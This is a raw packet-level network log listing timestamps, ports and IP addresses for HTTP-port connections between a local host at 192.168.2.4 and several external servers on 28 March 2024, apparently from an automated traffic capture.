Mar 28, 2024 09:14:59.614365101 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.614392042 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.614392996 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.614413023 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.614439011 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.614454985 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.614470959 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.614483118 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.614496946 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.614516973 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.614540100 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.614547968 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.614561081 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.614574909 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.614609003 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.614613056 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.614625931 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.614638090 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.614651918 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.614672899 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.614675999 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.614696980 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.614722013 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.614738941 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.614743948 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.614757061 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.614790916 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.614797115 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.614818096 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.614842892 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.614859104 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.614871979 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.614885092 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.614917994 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.614924908 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.614948988 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.614960909 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.614974976 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.614980936 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.615008116 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.615019083 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.615030050 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.615068913 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.615092039 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.615119934 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.615149021 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.615149975 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.615164042 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.615209103 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.615221024 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.615235090 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.615277052 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.615283966 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.615289927 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.615302086 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.615320921 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.615345955 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.615345955 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.615386963 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.615413904 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.615437031 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.615447998 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.615463018 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.615475893 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.615499973 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.615521908 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.615525961 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.615550995 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.615581036 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.615588903 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.615591049 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.615602016 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.615637064 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.615657091 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.615664959 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.615670919 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.615685940 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.615709066 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.615720987 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.615725040 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.615750074 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.615761042 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.615767956 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.615798950 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.615799904 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.615834951 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.615848064 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.615879059 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.615902901 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.615931988 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.615979910 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.616014957 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.616027117 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.616053104 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.616058111 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.616091013 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.616103888 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.616108894 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.616132975 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.616138935 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.616153002 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.616175890 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.616175890 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.616204977 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.616224051 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.616240025 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.616249084 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.616297960 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.616333961 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.616343975 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.616369009 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.616370916 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.616409063 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.616435051 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.616449118 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.616458893 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.616480112 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.616498947 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.616513968 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.616535902 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.616549015 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.616561890 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.616586924 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.616606951 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.616611958 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.616650105 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.616655111 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.616668940 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.616704941 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.616717100 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.616754055 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.616766930 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.616792917 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.616812944 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.616817951 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.616846085 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.616862059 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.616875887 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.616887093 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.616900921 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.616923094 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.616925955 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.616945028 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.616964102 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.616969109 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.616991043 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.617007971 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.617028952 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.617041111 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.617054939 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.617068052 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.617098093 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.617111921 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.617124081 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.617125988 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.617153883 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.617166996 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.617177010 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.617232084 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.617245913 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.617259979 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.617269993 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.617275953 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.617290020 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.617320061 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.617336988 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.617350101 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.617351055 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.617363930 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.617383957 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.617399931 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.617413998 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.617439032 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.617453098 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.617455959 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.617475033 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.617490053 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.617500067 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.617515087 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.617532015 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.617552996 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.617568970 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.617599964 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.617614031 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.617616892 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.617640972 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.617656946 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.617666960 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.617680073 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.617703915 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.617719889 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.617729902 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.617744923 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.617757082 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.617780924 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.617790937 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.617806911 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.617824078 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.617847919 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.617852926 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.617867947 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.617901087 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.617927074 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.617939949 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.617958069 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.617976904 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.617996931 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.618001938 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.618016005 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.618029118 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.618041039 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.618057966 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.618072033 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.618088007 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.618108988 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.618134022 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.618151903 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.618165016 CET	80	49734	195.20.16.46	192.168.2.4
Mar 28, 2024 09:14:59.618180037 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.618205070 CET	49734	80	192.168.2.4	195.20.16.46
Mar 28, 2024 09:14:59.618294954 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:14:59.619133949 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.619170904 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.619196892 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.619224072 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.620031118 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.620059013 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.620095968 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.620115042 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.625366926 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.625386000 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.625435114 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.625464916 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.625977039 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.626036882 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.626081944 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.631253958 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.631272078 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.631314993 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.631325006 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.631891012 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.631906033 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.631917953 CET	80	49739	193.233.132.139	192.168.2.4
Mar 28, 2024 09:14:59.631953001 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.632023096 CET	49739	80	192.168.2.4	193.233.132.139
Mar 28, 2024 09:14:59.636950016 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.636995077 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.637036085 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.637675047 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.637721062 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.637734890 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.637779951 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.642776012 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.642807961 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.642827988 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.642849922 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.643533945 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.643560886 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.643608093 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.648502111 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.648519993 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.648562908 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.649205923 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.649260044 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.649260998 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.649303913 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.653820992 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.653881073 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.653934956 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.654930115 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.654969931 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.655018091 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.659296989 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.659317970 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.659365892 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.660635948 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.660653114 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.660690069 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.664630890 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.664638996 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.664685965 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.666213036 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.666239023 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.666285992 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.669982910 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.670000076 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.670044899 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.671890020 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.671920061 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.671937943 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.671952009 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.675168991 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.675193071 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.675244093 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.677532911 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.677558899 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.677603006 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.680409908 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.680425882 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.680475950 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.682990074 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.683005095 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.683058023 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.683096886 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.685570002 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.685586929 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.685641050 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.688476086 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.688492060 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.688530922 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.688561916 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.690779924 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.690793991 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.690845013 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.690855980 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.690968037 CET	80	49746	104.21.42.248	192.168.2.4
Mar 28, 2024 09:14:59.693841934 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.693857908 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.693905115 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.695760012 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.695775032 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.695821047 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.699178934 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.699193954 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.699230909 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.699259996 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.700689077 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.700702906 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.700830936 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.704495907 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.704510927 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.704546928 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.704571962 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.705557108 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.705584049 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.705616951 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.705630064 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.711997986 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.712013006 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.712068081 CET	49735	80	192.168.2.4	5.42.66.22
